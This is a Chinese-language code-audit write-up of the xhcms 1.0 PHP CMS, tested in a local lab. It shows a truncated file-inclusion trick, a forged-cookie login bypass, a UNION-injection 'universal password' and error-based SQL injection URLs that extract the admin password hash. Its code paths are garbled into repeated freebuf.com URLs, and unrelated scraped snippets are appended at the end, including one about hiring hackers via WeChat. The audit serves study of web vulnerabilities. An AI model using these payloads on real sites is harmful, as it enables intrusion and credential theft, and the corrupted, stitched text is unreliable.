环境:
win7 虚拟机
phpstudy2018
php5.2.17+apache
xhcms_v1.0
:
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:
单引号(')
双引号(")
反斜杠(\)
NULL
所以这里文件包含 00 截断肯定不行了。
?截断测试失败。
. 截断成功。
http://www.xhcms.com/?r=https://www.freebuf.com/articles/1.txt........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
/. 截断,测试长度(205)
http://www.xhcms.com/?r=https://www.freebuf.com/articles/1.txt/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/https://www.freebuf.com/articles/web/
同样的道理
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
对后台登录功能点审计。
首先从这段代码看看,为甚么访问后台动作 action 会等于,
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
为空的话,应该等于,包含,
<?php
require'https://www.freebuf.com/articles/inc/checklogin.php';
require'https://www.freebuf.com/articles/inc/conn.php';
$indexopen='class="e25b-ebdc-bb96-0b77 open"';
?>
这里包含了,
<?php
$user=$_COOKIE['user'];
if($user==""){
header("Location: ?r=login");
exit;
}
?>
这里判断 cookie ,由于没有 cookie ,所以跳转到,
但是这里也很明显,可以伪造 cookie, 使其不跳转 login,
直接登录
我们再来看看正常输入账号密码的登录流程。
:
<?php
ob_start();
require'https://www.freebuf.com/articles/inc/conn.php';
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];
?
if($login<>""){
$query="SELECT * FROM manage WHERE user='$user'";
$result=mysql_query($query) ordie('SQL语句有误:'.mysql_error());
$users=mysql_fetch_array($result);
?
if(!mysql_num_rows($result)) { ?
echo"<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo"<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}
//写入登录信息并记住30天
if($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo"<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>
这里查用户名,查出以后再判断其密码md5值是否相等,
那么我们即可构造万能密码,受 php.ini 配置和 mysql 字符集的影响,这里 mysql 字符集为 utf-8 ,
如果 php.ini 中就存在注入,如果为 on 就不存在。
我们暂且按照关闭测试。
先看看数据库有 8 个字段
第四个是密码。
构造
账号: 1' union select 1,2,3,md5(4),5,6,7,8# 密码: 4
成功登录,
当然此处其他注入收发也可以,比如报错注入。
:
<?php require 'inc/conn.php'; require 'inc/time.class.php'; $query="SELECT * FROM settings"; $resul=mysql_query($query) or die('SQL语句有误:'.mysql_error()); $info=mysql_fetch_array($resul); $id=addslashes($_GET['cid']); $query="SELECT * FROM download WHERE id='$id'"; $resul=mysql_query($query) or die('SQL语句有误:'.mysql_error()); $download=mysql_fetch_array($resul); //浏览计数 $query="UPDATE download SET hit=hit+1 WHERE id=$id"; @mysql_query($query) or die('修改错误:'.mysql_error()); ?>
浏览次数这里无单引号保护,存在注入。
可进行报错注入
http://www.xhcms.com/?r=software&cid=1 or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),1,30),0x7e))# http://www.xhcms.com/?r=software&cid=1 or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),31,30),0x7e))#
分别得到
修改错误:XPATH syntax error: '~21232f297a57a5a743894a0e4a801f~' 修改错误:XPATH syntax error: '~c3~' 拼接: 21232f297a57a5a743894a0e4a801fc3
得到密码
还有和这个是一样的。
当然还有很多登陆后台以后的sql注入,这里不一一展开了。
去尝试评论功能点
这里只显示了昵称处的 xss
评论处的xss被过滤,去回溯代码分析为啥?
抓包很明显,对应的 文件为
48 行,被过滤了
$content=addslashes(strip_tags($content));//过滤HTML
微信号怎么找黑客 1、找客单新手们最基本的一步就是得到一份Linux或BSD,微信号专业接单开始监视。将来出师还要挂出门派始祖,9月1日外电消息,黑客张晋的凌找黑客厉武打风格。你封不死的,则有,冲出杜...
怎么扫描文件到电脑(三招教你把一本书内容轻松扫描到电脑中)把一本书扫描到电脑里,一般可以考虑使用手机、高拍仪或者扫描仪将书本扫描到电脑里。使用手机扫描成本最低,效果一般。使用专业高拍仪,效果较高,操作...
然而,在合适的时间,提出一个正确问题,却并不是一件容易的事情。甚至,有时候,一个错误时间里的糟糕提问,还会带来灾难性的后果。 举个例子吧,你的同事与客户起了争执,跑来和你诉苦,你质问他,并指责都是他...
此刻人们糊口程度在提高,随之而来的也有各类的疾病,所以许多的人都开始注重起了养生,就连美食也不破例,而顺旺基中式快餐加盟跟消费者的见识不约而同,这也就是为什么顺旺基中式快餐加盟可以或许一直在市场中保持...
原标题:当老婆说累说苦时,要及时关心她 前几天朋友聚餐,男男女女一大堆,由于新妈妈较多,很自然的就聊到了生孩子的问题,女人们免不了又是一顿吐槽,大概说的多了,男人们就有意见了: 你们女...
三江源指的是哪三江(中国水系之三江源)黄河、长江,是中华民族的母亲河;澜沧江,流经老挝、缅甸、泰国、柬埔寨和越南时称湄公河。直到近代以后,人们才发现,这三条江河的源头是如此接近,人们亲切地把那一片土地...